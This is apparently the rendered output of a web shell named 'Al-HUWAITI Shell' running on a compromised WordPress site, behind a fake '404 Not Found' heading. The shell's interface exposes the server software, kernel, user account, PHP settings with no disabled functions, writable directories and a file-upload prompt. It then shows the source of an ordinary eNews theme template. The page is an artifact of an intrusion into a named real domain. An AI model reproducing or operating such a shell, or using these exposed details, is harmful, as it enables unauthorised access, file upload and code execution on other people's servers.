hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/eNews/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/www.obusignal.com/www.obusignal.com/wp-content/themes/eNews/includes/blogstyle.php
	<div id="main-area-wrap">
			<div id="wrapper">
				<div id="main" class="noborder">
<?php if (get_option('enews_duplicate') == 'false') {
	$args=array(
	   'showposts'=>get_option('enews_homepage_posts'),
	   'post__not_in' => $ids3,
	   'paged'=>$paged,
	   'category__not_in' => get_option('enews_exlcats_recent'),
	);
} else {
	$args=array(
	   'showposts'=>get_option('enews_homepage_posts'),
	   'paged'=>$paged,
	   'post__not_in' => $ids2,
	   'category__not_in' => get_option('enews_exlcats_recent'),
	);
};
query_posts($args);
if (have_posts()) : while (have_posts()) : the_post(); ?>
			<h1 class="post-title"><a href="<?php the_permalink() ?>" title="<?php printf(__('Permanent Link to %s','eNews'), get_the_title()) ?>"><?php the_title() ?></a></h1>
			<span class="meta-comments"><?php comments_popup_link(__('0 comments','eNews'), __('1 comment','eNews'), '% '.__('comments','eNews')); ?></span>
			
			<?php if (get_option('enews_postinfo') <> '') { ?>
				<div class="post-meta">
					<div class="post-meta-bottom">
						<p><?php _e('Posted','eNews') ?> <?php if (in_array('author', get_option('enews_postinfo'))) { ?> <?php _e('by','eNews') ?> <span class="author"><?php the_author() ?></span><?php }; ?><?php if (in_array('date', get_option('enews_postinfo'))) { ?> <?php _e('on','eNews') ?> <?php the_time(get_option('enews_date_format')) ?><?php }; ?><?php if (in_array('categories', get_option('enews_postinfo'))) { ?> <?php _e('in','eNews') ?> <?php the_category(', ') ?><?php }; ?><?php if (in_array('comments', get_option('enews_postinfo'))) { ?> | <?php comments_popup_link(__('0 comments','eNews'), __('1 comment','eNews'), '% '.__('comments','eNews')); ?><?php }; ?></p>
					</div>	
				</div>
			<?php }; ?>	
			
			<div id="post-content"> 
<?php if (get_option('enews_thumbnails') == 'on') { ?>
	
	<?php $width = get_option('enews_thumbnail_width_posts');
		  $height = get_option('enews_thumbnail_height_posts');
		  $classtext = 'thumbnail alignleft';
		  $titletext = get_the_title();
		
		  $thumbnail = get_thumbnail($width,$height,$classtext,$titletext,$titletext);
		  $thumb = $thumbnail["thumb"]; ?>

	<?php if($thumb <> '') { ?>
		<?php print_thumbnail($thumb, $thumbnail["use_timthumb"], $titletext, $width, $height, $classtext); ?>
	<?php }; ?>

<?php }; ?>
				<?php the_content(); ?>
				<?php edit_post_link(__('Edit this post','eNews')); ?>
			</div> <!-- end post-content -->
			<br class="clearfix"/>
<?php endwhile; ?>
	<?php if(function_exists('wp_pagenavi')) { wp_pagenavi(); } 
	else { ?>
	<p class="pagination">
		<?php next_posts_link(__('&laquo; Previous Entries','eNews')) ?>
		<?php previous_posts_link(__('Next Entries &raquo;','eNews')) ?>
	</p>
	<?php } ?>
<?php else : ?>
	<!--If no results are found-->
	<div id="post-content"> 
		<h1><?php _e('No Results Found','eNews') ?></h1>
		<p><?php _e('The page you requested could not be found. Try refining your search, or use the navigation above to locate the post.','eNews') ?></p>
	</div>
	<!--End if no results are found-->
<?php endif; wp_reset_query(); ?>
		</div> <!-- end main -->

Al-HUWAITI Shell